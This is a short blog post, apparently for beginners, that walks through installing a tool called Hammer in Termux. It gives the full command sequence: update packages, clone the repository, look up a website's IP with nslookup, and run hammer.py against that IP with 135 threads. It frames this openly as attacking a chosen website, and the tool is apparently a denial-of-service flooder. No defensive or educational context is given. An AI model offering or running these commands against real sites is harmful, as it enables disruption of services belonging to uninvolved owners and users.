How to install hammer in termux.

🔥HOW TO INSTALL HAMMER🔥


$ apt update

$ apt upgrade

$ apt install python

 $ apt install git

$ apt install dnsutils

$ git clone https://github.com/CruzTed/Hammer

Hammer need the Name Server of a website which you want to attack... To get the Name Server...just type

$ nslookup example.com

Note the IP Address of that Website then

 $ cd Hammer $ python3 hammer.py -s [ip Address] -t 135

example:

$ python3 hammer.py -s 123.45.67.89 -t 135



Thank you for visiting, for don't forget to subscribe

No comments:

Post a Comment

How to add mouse input in cpp programming using xCode.mp4

  Download  How to add mouse input in cpp programming using xCode.MP4 🖱️ How to Add Mouse Input in C++ Programming Using Xcode When deve...